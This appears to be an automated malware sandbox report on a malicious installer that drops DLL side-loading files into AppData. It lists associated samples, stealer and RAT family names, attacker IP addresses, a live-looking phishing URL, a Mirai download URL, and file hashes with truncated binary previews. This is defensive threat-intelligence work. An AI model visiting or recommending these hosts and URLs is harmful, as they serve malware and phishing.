NETIS-ASRU	tpHjYMAP4B.exe	Get hash	malicious	Unknown	Browse	193.233.48.182
	tpHjYMAP4B.exe	Get hash	malicious	Unknown	Browse	193.233.48.182
	file.dll	Get hash	malicious	Matanbuchus	Browse	193.233.48.225
	file.dll	Get hash	malicious	Matanbuchus	Browse	193.233.48.225
	D68A7490C870C48F7652805B573D92B95C74B399CF0BD3EC06C9236D00BD0D06.exe	Get hash	malicious	Bdaejec, RedLine	Browse	193.233.48.58
	Imnzaff.exe	Get hash	malicious	PureLog Stealer	Browse	193.233.48.61
	http://interpol.ws/fuez/dlz.x86_64	Get hash	malicious	Mirai, Moobot	Browse	193.233.49.136
	https://facebook.com+login=secure+settings=private@56b361.mxxauthen.ru/hash/ZGF3bi53YXRlcmhvdXNlQHZpaGEuY2E=	Get hash	malicious	HTMLPhisher	Browse	193.233.48.170
	file.exe	Get hash	malicious	Unknown	Browse	193.233.49.38
	D7F94C05F6D679EA0DF97E773EE754166ECEE640BD2B9.exe	Get hash	malicious	Clipboard Hijacker, DCRat, RedLine	Browse	193.233.49.109

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	tpHjYMAP4B.exe	Get hash	malicious	Unknown	Browse	193.233.48.182
	tpHjYMAP4B.exe	Get hash	malicious	Unknown	Browse	193.233.48.182
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	193.233.48.182
	NbJ53jOHvQ.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	193.233.48.182
	file.exe	Get hash	malicious	LummaC	Browse	193.233.48.182
	E54zi65444.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Stealc	Browse	193.233.48.182
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	193.233.48.182
	file.exe	Get hash	malicious	LummaC	Browse	193.233.48.182
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc	Browse	193.233.48.182
	file.exe	Get hash	malicious	LummaC	Browse	193.233.48.182

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Hazan\cv099.dll	PauizRq7By.msi	Get hash	malicious	RHADAMANTHYS	Browse
C:\Users\user\AppData\Local\Hazan\cv099.dll	VqBVE8dJEA.exe	Get hash	malicious	Remcos	Browse
C:\Users\user\AppData\Local\Hazan\ManyCam.exe	PauizRq7By.msi	Get hash	malicious	RHADAMANTHYS	Browse
	XtDhwVrVKn.exe	Get hash	malicious	Unknown	Browse
	VqBVE8dJEA.exe	Get hash	malicious	Remcos	Browse
C:\Users\user\AppData\Local\Hazan\CrashRpt.dll	PauizRq7By.msi	Get hash	malicious	RHADAMANTHYS	Browse
	XtDhwVrVKn.exe	Get hash	malicious	Unknown	Browse
	VqBVE8dJEA.exe	Get hash	malicious	Remcos	Browse

Created / dropped Files

C:\Config.Msi\5fd64e.rbs

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	9527
Entropy (8bit):	5.67112350439084
Encrypted:	false
SSDEEP:	192:5GqiR+xjeVYZYUY0wsIg0wsZYsYWYwVYWYdDrPYEYvYeYTYswUppuYfYBYFYFYH0:Uq1x+h0w40wdFrpr5rAdgT8s/Pwmii4f
MD5:	3121E0D7A200D7FF11D708F3994A7329
SHA1:	F017CDE1F803C740446B09FE7AA48C71CBC7082E
SHA-256:	337FBDFEE7420152635A69FBC0BB8664758E7DED73161D77054BBBA1C00FC053
SHA-512:	F8BBB8388BEA7FE3178B61265BCAA879FAD2DEC0201419AC40B57424F9F296EF839A7FB52E5129CA8452273A0E855B8BE124D40B5F57BEED4393A09941A858C0
Malicious:	false
Preview:	...@IXOS.@.....@.1RY.@.....@.....@.....@.....@.....@......&.{C71E1024-3B5C-4357-ACD5-CB38070D632B}..Skyway..kvW4hZu9JA.msi.@.....@.....@.....@........&.{C2411C2F-1F57-4746-A7B0-9045F077EB67}.....@.....@.....@.....@.......@.....@.....@.......@......Skyway......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{7214B7BC-5375-5A23-81FA-7D5AA7A3DBDA}&.{C71E1024-3B5C-4357-ACD5-CB38070D632B}.@......&.{33110924-66D7-5B68-8143-9AD3793F63F9}&.{C71E1024-3B5C-4357-ACD5-CB38070D632B}.@......&.{F06CBCF3-C291-5AEF-8D88-CBFDBF1E7AF9}&.{C71E1024-3B5C-4357-ACD5-CB38070D632B}.@......&.{5A74A4FB-F8B3-58D4-B45B-E88123F2B0FC}&.{C71E1024-3B5C-4357-ACD5-CB38070D632B}.@......&.{AE297845-2E04-5EE6-A0ED-C1B2B2042087}&.{C71E1024-3B5C-4357-ACD5-CB38070D632B}.@......&.{F9C149E1-EE1D-562A-B884-E303319ECAAD}&.{C71E1024-3B5C-4357-ACD5-CB38070D632B}.@......&.{AD85B613-B800-5AAD-B37B-EC0E9F4E1921}&.{C71E1024-3B5C-4357-ACD5-CB3

C:\Users\user\AppData\Local\Hazan\CrashRpt.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	123976
Entropy (8bit):	6.382577198291231
Encrypted:	false
SSDEEP:	3072:fzjKVg7GOfS5SqPcCXA4SQlah+8Z4OAAHWTtopW+Z:fzjKVg7GOESqPcCXxT8hhZ4OAAHW2Wa
MD5:	B2D1F5E4A1F0E8D85F0A8AEB7B8148C7
SHA1:	871078213FCC0CE143F518BD69CAA3156B385415
SHA-256:	C28E0AEC124902E948C554436C0EBBEBBA9FC91C906CE2CD887FADA0C64E3386
SHA-512:	1F6D97E02CD684CF4F4554B0E819196BD2811E19B964A680332268BCBB6DEE0E17B2B35B6E66F0FE5622DFFB0A734F39F8E49637A38E4FE7F10D3B5182B30260
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: PauizRq7By.msi, Detection: malicious, Browse Filename: XtDhwVrVKn.exe, Detection: malicious, Browse Filename: VqBVE8dJEA.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................W.....U.....U.............U.......U.......U.....U.....U....Rich....................PE..L.....M...........!................'........ ......................................Gb..............................P........t..........d%..............H...........`$..............................0W..@............ ...............................text...8........................... ..`.rdata../l... ...n..................@..@.data...t...........................@....rsrc...d%.......&..................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Hazan\ManyCam.exe

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1756232
Entropy (8bit):	6.047140524753333
Encrypted:	false
SSDEEP:	49152:wlkcF8MnJ6tdGeHzpNTxlSvQynZAWBM2FU+SrzcBsWLZF5:wlf8MnJ6tdGeHzpNTxlSvfnOWC6U5Ed5
MD5:	BA699791249C311883BAA8CE3432703B
SHA1:	F8734601F9397CB5EBB8872AF03F5B0639C2EAC6
SHA-256:	7C4EB51A737A81C163F95B50EC54518B82FCF91389D0560E855F3E26CEC07282
SHA-512:	6A0386424C61FBF525625EBE53BB2193ACCD51C2BE9A2527FD567D0A6E112B0D1A047D8F7266D706B726E9C41EA77496E1EDE186A5E59F5311EEEA829A302325
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: PauizRq7By.msi, Detection: malicious, Browse Filename: XtDhwVrVKn.exe, Detection: malicious, Browse Filename: VqBVE8dJEA.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........3...R..R..R..f]..R..2...R....R....R....R....R..R..Q.....R....R....R..Rich.R..........................PE..L...e..M............................\|B............@.................................f.........P......................................@..................H............................................d..@............................................text...b........................... ..`.rdata..B...........................@..@.data........P.......P..............@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Hazan\cv099.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	679936
Entropy (8bit):	6.674616014554414
Encrypted:	false
SSDEEP:	12288:dHxL34kbwAQR5+ERTJGZfnpyvhZFjtJbPbwQjtX5ooVyPMDFdqvGHjucsEUNwm/7:dzbwAQR57RJGoxjP7/2+HINwwb
MD5:	2A8B33FEE2F84490D52A3A7C75254971
SHA1:	16CE2B1632A17949B92CE32A6211296FEE431DCA
SHA-256:	FAFF6A0745E1720413A028F77583FFF013C3F4682756DC717A0549F1BE3FEFC2
SHA-512:	8DAF104582547D6B3A6D8698836E279D88AD9A870E9FDD66C319ECADA3757A3997F411976461ED30A5D24436BAA7504355B49D4ACEC2F7CDFE10E1E392E0F7FB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: PauizRq7By.msi, Detection: malicious, Browse Filename: VqBVE8dJEA.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.IO.q'..q'..q'...Y..q'.:.J..q'.:.Z..q'.:.\..q'..q&..q'.:.I.#q'.:.]..q'.:.[..q'.:._..q'.Rich.q'.........PE..L.....YM...........!.........p..........................................................................................a+......P.......,.......................T9..P...................................@...............,............................text............................... ..`.rdata..............................@..@.data...........0..................@....rsrc...,...........................@..@.reloc...:.......@... ..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Hazan\cxcore099.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	929792
Entropy (8bit):	6.883111719944197
Encrypted:	false
SSDEEP:	24576:dNoLaQGpXDCfZCgs1ruSteHz3+AzEOyIrbnYyw:7msgUeTGIrbM
MD5:	286284D4AE1C67D0D5666B1417DCD575
SHA1:	8B8A32577051823B003C78C86054874491E9ECFA
SHA-256:	37D9A8057D58B043AD037E9905797C215CD0832D48A29731C1687B23447CE298
SHA-512:	2EFC47A8E104BAA13E19BEE3B3B3364DA09CEA80601BC87492DE348F1C8D61008002540BA8F0DF99B2D20E333D09EA8E097A87C97E91910D7D592D11A953917A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................&......&......&............&......&......&......&.....Rich...........PE..L...w.YM...........!......... .......................................................d..................................b(......d....@..4....................P...e......................................@...............H............................text............................... ..`.rdata..b/.......0..................@..@.data........@...p...@..............@....rsrc...4....@......................@..@.reloc...g...P...p..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Hazan\cximagecrt.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	498760
Entropy (8bit):	6.674124910838454
Encrypted:	false
SSDEEP:	12288:fJaqPgrHZx0Cxn0P5ASCH8aH6IAC+tITsQ8p:fkqPgr5x0Cxn0P5ASCH8aaIACDTx8p
MD5:	C36F6E088C6457A43ADB7EDCD17803F3
SHA1:	B25B9FB4C10B8421C8762C7E7B3747113D5702DE
SHA-256:	8E1243454A29998CC7DC89CAECFADC0D29E00E5776A8B5777633238B8CD66F72
SHA-512:	87CAD4C3059BD7DE02338922CF14E515AF5CAD663D473B19DD66A4C8BEFC8BCE61C9C2B5A14671BC71951FDFF345E4CA7A799250D622E2C9236EC03D74D4FE4E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B2/..SA[.SA[.SA[..?[.SA[!.<[.SA[!.:[.SA[.S@[.SA[!.,[ISA[!./["SA[!.;[.SA[!.9[.SA[Rich.SA[................PE..L......M...........!.........`......]........ ......................................a!..................................#U..t...x....@..................H....P... ..p"..............................@...@............ ..X............................text............................... ..`.rdata....... ....... ..............@..@.data...<....0.......0..............@....rsrc........@.......@..............@..@.reloc..n!...P...0...P..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Hazan\dbghelp.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	489984
Entropy (8bit):	6.621181912245107
Encrypted:	false
SSDEEP:	6144:HPEKP8f7yHkluOutwm5ZNetC5IlhhM1yFWgQK7x5Iz4JxRRAuUzT/9cl84S683Wb:HPrX5ZNG2yQycw5IGxRwVc6683Wb/n
MD5:	AA1594596FA19609555E317D9B64BE6A
SHA1:	924B08D85B537BE52142965C3AD33C01B457EA83
SHA-256:	5139413EA54DEE9EC4F13B193D88CCAE9ADB8F0D8C1E2BA1AEE460D8A0D5BB79
SHA-512:	759209846039D1EFB2F6DDF3501F1F868989E81752BB7D617AFD9FD4238C52162167B1A1732EC81BDFCE469856C78439CC7C8D173B1F48DE499DFEE725B192DC
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 42%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$..`..`..`.....I.....b..`........k......g.....p.....a......a.....w.....a..Rich`..........PE..L.....m=...........!................5l............Qm................................................................0.......$...x....P.......................`...K..@................................................................................text............................... ..`.data...,@.......*..................@....rsrc........P......................@..@.reloc...e...`...f..................@..B..m=8...(.m=C...(.m=P.......Z...(.m=f...).m=s...........msvcrt.dll.KERNEL32.dll.NTDLL.DLL.VERSION.dll.ADVAPI32.dll.RPCRT4.dll...................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Hazan\gxfiogr

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	52497
Entropy (8bit):	4.634957678200076
Encrypted:	false
SSDEEP:	1536:eHvrL3y27GIffhDSwOT+vdBFysPqPni6ajhz:orzy2RI6vJyWqGz
MD5:	B590C33DD2A4C8DDEDDA46028181A405
SHA1:	B0949A3396D84B8E4DCA5D5026EB3B6C0679F7E3
SHA-256:	862AADCB096647394A5F6F5E646BF57B52567180505B6026E59539F6DED1EAA8
SHA-512:	E72B33CA405B551532A855A74F99AAB1850756CBAEFB9421D6E480E719B6CEEAD1D728DBC786D76D91532F0BBDCC241039DAC35479BF90F7D2D665C6AB9F8DA7
Malicious:	false
Preview:	..OK......lRL......O...O.gmXe..VZ....h.UA.tW....S.f....T..U.D.Gi.I..G..R..aw.`.HnU.....fOU...D.a...M.l`OiF`J....Ii....H.L.CdQAZ.N..F....bV.KlU.HG.Al...aP^..._`.xbN.....]...UX...s[r...GT.x.wL....BU.ev..cQ.q.......V..[Owfl.JL.gf.E...F..Xo.yd..[f.QCTjHt..Ua.y......Z.i..P.pv._V....AO.S..chT....P.D..w.ks._.wp...^D.Sy...M..a..ip`TG^a.........m.\A..hm..u..A.jd.KFPa...Gd..qWGZ....O.Y...U..._..I.FEhHWtD.].D..s.a...yeH...g..l...x....j...Xn.v.Uf....[..Dvp.c..t..V.ODI.M.].IWE.M..Td.....y.c..G_.cKI.T^X.y......I_P.d.h..CeZ..]...qHpf.A.iPtxRf...Y....Fi.pr..L.C.jRX\...Wu.F.eP.Lr.j.J.A....h..nWQ.o.[\r...V_..M..d._..`..]XM.e.Vb.PxJ.ai..I].Aqa..k.\.LL.R...O...D..uDs.fVs.i.l...S.J.f.UJT.TKcPZnUo.dZda.hm..P.anWu...n...j..d.].D...h...r.N.....Mk...e]`..wyk.e..s..M[.w..[.gA.oEY..d..W.sR.X..IdJ.X.hNrCR\.S...Mryj...w._K..r_.^`N.UDt..emtt..r.O..D.h....m.m.p.UiOY^a.........kP...FX..g..sIB..A...v...P\...I..eW..I..B.l.E..I..L.SVaHr.....y...P.......rTuj.aAnF.A.G.R..C....KF...TH.SB.Fm....Mn..LY..Mx..cBiF.G.....FQRr..

C:\Users\user\AppData\Local\Hazan\highgui099.dll

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	397312
Entropy (8bit):	6.672405371278951
Encrypted:	false
SSDEEP:	12288:J+7gXTkVRt1dixRtVq2EjMS2E7ETstO/:JlTeRt1dSzd4MSUTsO/
MD5:	A354C42FCB37A50ECAD8DDE250F6119E
SHA1:	0EB4AD5E90D28A4A8553D82CEC53072279AF1961
SHA-256:	89DB6973F4EC5859792BCD8A50CD10DB6B847613F2CEA5ADEF740EEC141673B2
SHA-512:	981C82F6334961C54C80009B14A0C2CD48067BAF6D502560D508BE86F5185374A422609C7FDC9A2CDE9B98A7061EFAB7FD9B1F4F421436A9112833122BC35059
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r\|..6...6...6......4......;......5....;..n......#...6..........."......7......7......7...Rich6...........PE..L.....YM...........!.........@......y........................................ .......r.............................. K..F....9..........d........................#..`...................................................D............................text............................... ..`.rdata..f...........................@..@.data...0r...`...p...`..............@....rsrc...d...........................@..@.reloc...$.......0..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Hazan\rsjddfw

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	1073822
Entropy (8bit):	7.922156415332642
Encrypted:	false
SSDEEP:	24576:7JMc50r5Zz+16+mE3sgl92t2sOx0XUe/dxplKAMt9DZdr7b4P6ZkUP:KH5Zd5Exl9W2H0XUcxpc9DPfNZkUP
MD5:	6661E1E837A5BB238D7E427B0788D6C8
SHA1:	4C7B26F251169780C8407A19B2AAD12FA88A5FCD
SHA-256:	D2668722A26848BCE20E2D9CFEE8A773F076AAB009BA8601EA65D142C4C1E1DA
SHA-512:	D6D562D28938275D2F7CCBCAC9F2EA9A1FE9BB572B1A01A719D08730D87A0A9400F30A71B1EB25D4671B7DB786FE92A899D485F28E73FBA2A75B9159C79D99D0
Malicious:	false
Preview:	.pD.a..yb.m...vXcH.F.XKTH.G`CD.gH.vuclG...nfpiR.c....A..E.A.O..i....qU..........NpEhaYl.g....Jkn..M...t.av`FXR....Eks...MgLkQ[S.^.VP.FQm_.ID_...RQ.sXS.].peAP.hof...Vv].t.LS_B.ytg`x.pXc..A.Dy.JAJ.h..]S..Ai.r.ES.............O...lw..QjB.EOCP.K..^..hwT.t..].O.A..[.K..i^.l.F..U.ENyG...o..S.......Xe`UuO.J....._WyE.b.F.Y..vRm.k`VUwt.c.y.QG.[o.W..M...h.Y\.E....Y.OJDr.l..c.H.....vsAh.....A...c..d^cn..h.M.[.y..TLw.h.nZV..jcO[_.u...]...xBmIG..n.YAT...ux.aK.x...sw.....\..Vf...F..Pc.h..dk..tP_I..x.G^....A.....Ew..gAH..T..oyx....u.A.L..G...w..oxe...t.Di...m.xrg.wPb.k.H.Bc\..M.Xu.J.P.V.akF....Ca.N`T..I.....B...w..S.P....y\aAe...EcJSrR`c.gMfMu..e...x.Z.vhwf.R..I.x...Ga.n.P.e.cS......._ts...j..q....q.e..\...\pKM.sZYo....[.n....M.tT..eaIgfd.yG.....bR.......B.p....ic.e..yVsM...no.wn^B..dDf..Ih_p...b..Y.H....fTZ.c...Odby..v.u...I..j.DR.DSrW.O.r...bw..QhPcp....uv.b.o.``aJVoq..L..B...k....H_X..UC..ERB.ko.ek.X....WTM.w.u...ZOt....sJ.O.N.E..Bd.yy\.q.Yu..GP.i..g.Cv.E`.....j.b...KcX..P......axhk.dY..yv...tKSDR\

C:\Users\user\AppData\Local\Temp\a19aeeb0

Download File

Process:	C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe
File Type:	data
Category:	dropped
Size (bytes):	1336843
Entropy (8bit):	7.702457833405421
Encrypted:	false
SSDEEP:	24576:j279ZZLadgOXW01fZ6e+RehA1/6L9ogbpH3W9WUU0xL5zLtqvDSy13H:y75LadgKW+xLe1VgbRW9jdz0vH
MD5:	77AEF750532ADF1EAA0B35300D58B811
SHA1:	9755ED95BDC90E21EF1DD1846E8C2C8DF43A4908
SHA-256:	D94581ED1C0DCC22B478F2C6645D31EBE18E415A9FDC2CCAD9C0910D966C266E
SHA-512:	B7CC6F62392F70F9020796A36D33D03825880D2082808015BB86B509CDB36172241C380CD54559C151D15226723EA9F1BCE04440197BBF21E4824B6CCE6643C4
Malicious:	false
Preview:	...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M..Z...^...G$..e>..~...d)..y...k?.G(..V...m?..y...k?..zM...M...M...M...M...M...M...M...M...M...M...M..C#..c,..p(...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M..I?..~(..y9..i(...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M..C...Xh..c...y"..$...V...g(..x&...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M.$}..:z...M...M...M...M...M...M...M...M...M...M...M

C:\Users\user\AppData\Local\Temp\b72d587a

Download File

Process:	C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe
File Type:	data
Category:	dropped
Size (bytes):	1336843
Entropy (8bit):	7.70245604250463
Encrypted:	false
SSDEEP:	24576:h279ZZLadgOXW01fZ6e+RehA1/6L9ogbpH3W9WUU0xL5zLtqvDSy13H:g75LadgKW+xLe1VgbRW9jdz0vH
MD5:	9459F6CDF99F10716CF9DBF988B86554
SHA1:	F6241DD5F681E85C1EDE529EEA58FD110D16B0E5
SHA-256:	DA94F3FA19532E65E04938BD6B86FA464697583444D8A7AD565C4E80E2468332
SHA-512:	EDDABCBB5E81E9A2A3A531D0948814A103D29BFF20742561F913DB9B37ACDBC6EB99374F84C651DA670EC2E74C0B66E18D97C7E1C8A2F587A500682EE489B6F5
Malicious:	false
Preview:	...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M..Z...^...G$..e>..~...d)..y...k?.G(..V...m?..y...k?..zM...M...M...M...M...M...M...M...M...M...M...M..C#..c,..p(...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M..I?..~(..y9..i(...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M..C...Xh..c...y"..$...V...g(..x&...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M.$}..:z...M...M...M...M...M...M...M...M...M...M...M

C:\Users\user\AppData\Local\Temp\be1e7cd8

Download File

Process:	C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe
File Type:	data
Category:	dropped
Size (bytes):	1336843
Entropy (8bit):	7.702456030398671
Encrypted:	false
SSDEEP:	24576:d279ZZLadgOXW01fZ6e+RehA1/6L9ogbpH3W9WUU0xL5zLtqvDSy13H:M75LadgKW+xLe1VgbRW9jdz0vH
MD5:	A09C724ADE2CBCC74C0542B4A289E951
SHA1:	F775D4733AE63CC90536ED6E8E9BCB9CAF703647
SHA-256:	5070F434C1065D625EECCEADF39BF00B84A3474991DE70F0052EDE826DBC0F37
SHA-512:	FB77599CA377CAC8BC530279CBE30F18A356939BBCBF40025217E9EE13E24C6F6CEF1DDCDB5131EC4CDA42641A5CABEBA6E960D2349164A8ACB3AD9085E8AB83
Malicious:	false
Preview:	...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M..Z...^...G$..e>..~...d)..y...k?.G(..V...m?..y...k?..zM...M...M...M...M...M...M...M...M...M...M...M..C#..c,..p(...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M..I?..~(..y9..i(...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M..C...Xh..c...y"..$...V...g(..x&...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M...M.$}..:z...M...M...M...M...M...M...M...M...M...M...M

C:\Users\user\AppData\Local\Temp\blggjuprkr

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	604672
Entropy (8bit):	6.5726185445512755
Encrypted:	false
SSDEEP:	6144:SbA8Cslo8lP47drDOeOtXIWN43WzUkuB2y14Vn+k2BAGQndRQzXqBzO9mrmcFsrA:Ss88LRnrujNFzAY4VoWzj9mCcqHmO5dW
MD5:	CC2A2BBFBAE7E38098A3D677DB295419
SHA1:	15A88BD244D3E460998F230B0390DFB4DC9EDC29
SHA-256:	A14DE680626320014B4E874252B5F9FDC48BD2ED9355F55999A85F8D870E2FAD
SHA-512:	FEE1255ED5548252F3B096A73213E8EACD087B03C0451DE9F0FC5AB16B41296447BFBB16BA562994A0D7E9B680EBBB2FA8B13A74B5F212E5FD3551D2E5B0EF69
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 18%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........(".IL..IL..IL..1O..IL..1I..IL..1H..IL...O..IL...H..IL...I..IL..IM..IL...O..IL..IL..IL.....IL...N..IL.Rich.IL.........PE..d....j.Z.........."..........v......<..........@..........................................`..........................................................P....... ...)...........`..<...............................(...@...@...............P............................text...P........................... ..`.rdata..............................@..@.data...............................@....pdata...)... .....................@..@.rsrc........P......................@..@.reloc..<....`......................@..Brwtv.........p.....................@...................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ffjc

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Oct 18 09:08:34 2024, mtime=Fri Oct 18 09:08:34 2024, atime=Wed Oct 9 14:50:44 2024, length=1756232, window=hide
Category:	dropped
Size (bytes):	914
Entropy (8bit):	5.018769557737954
Encrypted:	false
SSDEEP:	24:8kBHY6npg+RiYEaJ/Jd5AXQj0J/h07oBm:8qHY6npBi6JhspJH
MD5:	844347CD04A34A1A08F40C539797C2C9
SHA1:	7EAFE16BF50C609C8DADC83988F91C4FB7B5CE83
SHA-256:	92F328E2A7FDFD09C161F884207022AEA3715EED16109F51D2E6968027579C00
SHA-512:	BF1C5F96B59D5264602BBDAAEB8790841F84240753A4E077CFF920AA0A0D4559685403A71B1D7C7E664E2846155CEBC95718A4E5F962E0FF2C026B09BDC2C38F
Malicious:	false
Preview:	L..................F.... ....K.E!..{#..E!......b...H.........................:..DG..Yr?.D..U..k0.&...&......vk.v....Ab..E!.....E!......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^RY.Q...........................%..A.p.p.D.a.t.a...B.V.1.....RY.Q..Roaming.@......CW.^RY.Q..........................<...R.o.a.m.i.n.g.....h.1.....RY.Q..GJS_CH~1..P......RY.QRY.Q..............................g.j.s._.c.h.a.n.n.e.l._.x.8.6.....b.2.H...IYV~ .ManyCam.exe.H......RY.QRY.Q..............................M.a.n.y.C.a.m...e.x.e.......i...............-.......h...........,k.:.....C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe..).....\.....\.R.o.a.m.i.n.g.\.g.j.s._.c.h.a.n.n.e.l._.x.8.6.\.M.a.n.y.C.a.m...e.x.e.`.......X.......414408...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

C:\Users\user\AppData\Local\Temp\klxgok

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	604672
Entropy (8bit):	6.5726185445512755
Encrypted:	false
SSDEEP:	6144:SbA8Cslo8lP47drDOeOtXIWN43WzUkuB2y14Vn+k2BAGQndRQzXqBzO9mrmcFsrA:Ss88LRnrujNFzAY4VoWzj9mCcqHmO5dW
MD5:	CC2A2BBFBAE7E38098A3D677DB295419
SHA1:	15A88BD244D3E460998F230B0390DFB4DC9EDC29
SHA-256:	A14DE680626320014B4E874252B5F9FDC48BD2ED9355F55999A85F8D870E2FAD
